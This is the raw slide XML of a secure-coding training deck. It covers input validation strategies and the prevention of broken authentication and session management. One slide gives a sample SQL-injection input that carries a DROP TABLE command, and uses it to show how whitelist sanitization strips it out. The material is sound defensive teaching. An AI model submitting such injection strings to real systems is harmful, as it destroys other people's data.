            </a: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Syntax or grammar should be checked prior to first use or inspection </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>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19</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41543865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5" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1600200"/>
            <a:ext cx="8001000" cy="2286000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Famous Quote-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>	“Believe nothing, no matter where you read it, or who said it, no matter if I have said it, unless it agrees with your own reason and  your own common sense.” </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="3657600"/>
            <a:ext cx="81534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1" dirty="0" smtClean="0"/>
              <a:t>Hence, Whatever I say, may not be “right” but I think, it is “real” and “practical”.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6499225"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Aujas Confidential</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="6400800"/>
            <a:ext cx="2133600"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C5F7CD-489D-44B8-847B-0811A0E37738}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>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lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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Three Strategies for Data Validation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reject Known Bad:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Negative / Blacklist validation</a:t>
            </a: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Maintain a list of all the characters u want to reject</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>slow</a:t>
            </a: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Requires an upward of 90 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>regex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> as of today to accomplish the task</a:t>
            </a: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Will fail in the long run, if not regularly updated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Incomplete protection</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20</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97986058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Three Strategies for Data Validation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sanitize the input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sanitize with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>whitelist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If you expect a integer value then strip out all no-digit characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Input like the following "555\";DROP TABLE USER;--123.1234“ will get converted to 5551231234</a:t>
            </a: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Sanitize with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>blacklist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Replacing certain characters with alternate text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>public String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>quoteApostrophe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(String input) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>{ if (input != null) return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>input.replaceAll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("[\']", "&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rsquo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;"); else return null; }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="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21</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3870943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520136" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A3. Broken Authentication &amp; Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="4518248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Account credentials and session tokens not properly protected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>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Attackers compromise passwords, keys, or authentication tokens to assume other users’ identities</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Weaknesses introduced through ancillary authentication functions such as logout, password management, timeout, remember me, secret question, and account update</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22</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2810302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7416824" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preventing Broken Authentication &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1143000"/>
            <a:ext cx="8458200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Secure communication and credential storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ensure that SSL is at least implemented for all authenticated parts of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Regenerating a new session upon successful authentication or privilege level change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>All the credentials are stored using a encryption/one way hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use a single authentication mechanism with appropriate strength and number of factors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Implement a strong password policy</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23</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437448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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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amond(in)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>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181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Only use inbuilt session management mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do not accept new, preset or invalid session identifiers -- &gt; Session fixation attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Limit or rid your code of custom cookies for authentication or session management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Remember Me functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Home grown SSO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ensure that every page has a logout link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Destroy all server side session state and client side cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use a timeout period that automatically logs out an inactive session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="76200"/>
            <a:ext cx="7416824" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preventing Broken Authentication &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7A1601AE-3AB5-4580-9556-3C20AF0CA3B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>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9748489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181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use only strong ancillary authentication functions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Questions and answers, password resets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do not expose any session identifiers or any portion of valid credentials in URLs or logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Implement a sound auditing and logging for authentication and authorization controls:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Who logged on?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>From Where?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Transactions performed?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data accessed?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="76200"/>
            <a:ext cx="7416824" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preventing Broken Authentication &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
